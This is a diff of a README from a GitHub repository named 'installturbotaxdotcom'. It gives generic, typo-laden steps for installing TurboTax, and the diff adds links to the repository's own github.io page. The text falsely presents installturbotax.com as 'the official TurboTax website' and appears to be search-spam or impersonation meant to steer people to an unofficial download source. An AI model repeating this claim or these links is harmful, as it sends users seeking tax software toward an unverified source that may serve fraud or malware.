installturbotaxdotcom/installturbotaxdotcom.github.io/README.md

 ## Learn!
 Here How to Install TurboTax Software?
 Installing TurboTax is quite simple.
 Here's what you need to do:
-1. Download the Installer: If you haven't already, download the TurboTax installer from the official TurboTax website – installturbotax.com.
+1. Download the Installer: If you haven't already, download the TurboTax installer from the official TurboTax website – <a href="https://installturbotaxdotcom.github.io/">installturbotax.com</a>.
 2. Lounch the Installer: Locate the downloaded file (usually in your "Downloads" folder) and double-click to run it.
 3. Follow all Instructions: A setup wizard will guide you through the installation process.
 Click on the "Next" button to proceed through the steps.
 4. Click on Accept the License Agreement: Read through the license agreement, and if you agree, select the option to accept it.
-5. Choose Installation Location: Select the destination folder where you want to install TurboTax.
+5. Choose Installation Location: Select the destination folder where you want to <a href="https://installturbotaxdotcom.github.io/">install turbotax</a>.
 6. Complete the process of Installation: Click "Install" to begin the installation process.
 It could take time to complete.
 7. Launch TurboTax: Once the installation is finished, click "Finish" to close the setup wizard and launch TurboTax.
 8. Enter License Code: If prompted, enter the license code that you received with your purchase to activate the software.